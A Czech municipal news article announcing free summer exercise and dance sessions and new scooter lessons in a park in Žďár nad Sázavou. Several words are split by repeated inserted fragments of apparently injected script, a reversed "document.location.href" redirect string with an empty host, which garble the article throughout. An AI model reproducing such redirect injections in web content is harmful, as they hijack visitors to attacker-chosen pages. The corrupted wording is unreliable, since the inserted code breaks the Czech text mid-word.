Rainbow page separator

V parku se bude opět cvičit a navíc i jezdit na koloběžce

Neděle, 25. dubna 2021

Žďár nad Sázavou / Také v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce se prostřednictvím projektu žďárské radnice Aktivně pro Žďár uskuteční pravidelné cvičení pro veřejnost v parku Farská humna. Novinkou bude už od 6. května výuka bezpečné jízdy na koloběžce, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to každý čtvrtek od 18 hodin. Kdo koloběžku k dispozici nemá, ale přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to by si chtěl jízdu na ní vyzkoušet, má možnost si ji předem zamluvit na telefonním čísle 608 558 091. Lekce jízdy na koloběžce potrvají do 27. května.
Středeční letní podvečery budou v době od 2. června do 25. srpna již tradičně vyhrazeny pro cvičení se Zuzanou Fej[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou, úterky od počátku června až do 24. srpna zase tanečním kreacím různých stylů s lek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkou Jarmilou Džamilou Kašparovou. Podmínkou konání všech venkovních cvičebních lekcí, které budou stejně jako v předchozích letech pro všechny zájemce zdarma, je příznivé počasí.